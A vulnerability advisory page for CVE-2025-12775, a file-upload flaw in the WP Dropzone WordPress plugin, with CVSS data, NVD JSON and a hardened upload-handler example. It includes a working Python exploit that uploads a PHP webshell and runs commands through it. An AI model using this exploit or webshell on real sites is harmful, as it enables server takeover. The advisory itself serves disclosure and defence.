Security Vulnerability Report
CVE-2025-12775 CVSS 8.8 HIGH

CVE-2025-12775

Published: 2025-11-18 09:15:49
Last Modified: 2026-04-15 00:35:42

Description

The WP Dropzone plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 1.1.0 via the `ajax_upload_handle` function. This is due to the chunked upload functionality writing files directly to the uploads directory before any file type validation occurs. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Dropzone plugin for WordPress <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-12775 PoC - WP Dropzone Arbitrary File Upload
This PoC demonstrates uploading a PHP webshell via the vulnerable endpoint.
"""
import re
import sys

import requests

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "attacker123"


def get_nonce(wordpress_url, username, password):
    """Login to WordPress and extract nonce and cookies"""
    session = requests.Session()

    # Get login page to extract nonce
    login_url = f"{wordpress_url}/wp-login.php"
    resp = session.get(login_url)

    # Extract login nonce
    nonce_match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', resp.text)
    if not nonce_match:
        print("[-] Failed to extract nonce")
        return None, None
    nonce = nonce_match.group(1)

    # Login
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "_wpnonce": nonce,
        "redirect_to": "/wp-admin/",
    }
    resp = session.post(login_url, data=login_data, allow_redirects=True)

    if "wordpress_logged_in" in str(session.cookies):
        print("[+] Login successful")
        return session.cookies, session
    else:
        print("[-] Login failed")
        return None, None


def upload_shell(session, wordpress_url):
    """Upload malicious PHP file via vulnerable endpoint"""
    upload_url = f"{wordpress_url}/wp-admin/admin-ajax.php"

    # PHP webshell content
    webshell = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

    # Chunked upload parameters
    files = {
        "file": ("shell.php", webshell, "application/x-php")
    }
    data = {
        "action": "dropzone_upload",
        "chunk": "0",
        "chunks": "1",
        "file_id": "malicious_shell",
    }

    print("[*] Uploading malicious PHP file...")
    resp = session.post(upload_url, files=files, data=data)

    if resp.status_code == 200:
        print("[+] File uploaded successfully")
        print(f"[*] Try accessing: {wordpress_url}/wp-content/uploads/dropzone/malicious_shell.php?cmd=whoami")
    else:
        print(f"[-] Upload failed: {resp.status_code}")
        print(resp.text)


if __name__ == "__main__":
    cookies, session = get_nonce(TARGET_URL, USERNAME, PASSWORD)
    if cookies:
        upload_shell(session, TARGET_URL)
```
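The defect described above is one of ordering: chunks reach the web-served uploads directory before any type check runs. The following is an added illustration (not code from the CVE record or from the WP Dropzone plugin) of a chunked-upload handler in the hardened ordering: every check that can be made from the request runs before any write, chunks are staged outside the web root, and the file is moved into the uploads directory only after it is complete and its content passes. The allowlist, the staging layout and the content sniff are assumptions.

```python
"""Hardened chunked upload: validate before any write, stage outside web root.
Added illustration for CVE-2025-12775 (CWE-434); not the plugin's own code.
Assumptions: the allowlist, the staging layout and the content sniff."""
import os
import re

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}   # assumed allowlist
# One base name and exactly one extension: rejects "shell.php.jpg", "../x.png".
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,100}\.([A-Za-z0-9]{1,5})$")
SAFE_ID = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
EXEC_MARKERS = (b"<?php", b"<?=", b"<script")   # assumed content sniff


def validate_filename(name):
    """True only for a single-extension name whose extension is allowlisted."""
    m = SAFE_NAME.match(name)
    return bool(m) and m.group(1).lower() in ALLOWED_EXTENSIONS


def handle_chunk(staging_dir, uploads_dir, file_id, name, chunk, chunks, data):
    """Process one chunk. Returns the final path after the last chunk, else None.

    Checks derived from the request run before any byte is written. Chunks
    accumulate in staging_dir (assumed to sit outside the web root) and the
    file only moves into uploads_dir once complete and free of executable
    markers. Chunks are assumed to arrive in order for a given file_id.
    """
    if not validate_filename(name) or not SAFE_ID.match(file_id):
        raise ValueError("rejected before any write: bad name or id")
    if not 0 <= chunk < chunks:
        raise ValueError("rejected before any write: bad chunk index")
    part = os.path.join(staging_dir, file_id + ".part")
    with open(part, "wb" if chunk == 0 else "ab") as fh:
        fh.write(data)
    if chunk + 1 < chunks:
        return None                     # wait for the remaining chunks
    with open(part, "rb") as fh:
        head = fh.read(4096).lower()
    if any(marker in head for marker in EXEC_MARKERS):
        os.remove(part)
        raise ValueError("rejected: executable content in upload")
    final = os.path.join(uploads_dir, name)
    os.replace(part, final)             # atomic move into the served directory
    return final
```

A request carrying `shell.php` is refused before `open()` is ever called, so nothing lands in either directory; a polyglot such as `pic.png` whose bytes contain `<?php` is discarded from staging after the last chunk.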

References

https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L127
https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L88
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395966%40wp-dropzone&new=3395966%40wp-dropzone&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7aeb7-2c6f-4b23-b8b1-52fb010e5aac?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12775",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T09:15:48.903",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP Dropzone plugin for WordPress is vulnerable to authenticated arbitrary file upload in all versions up to, and including, 1.1.0 via the `ajax_upload_handle` function. This is due to the chunked upload functionality writing files directly to the uploads directory before any file type validation occurs. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L127",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.0/includes/class-plugin.php#L88",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395966%40wp-dropzone&new=3395966%40wp-dropzone&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7aeb7-2c6f-4b23-b8b1-52fb010e5aac?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```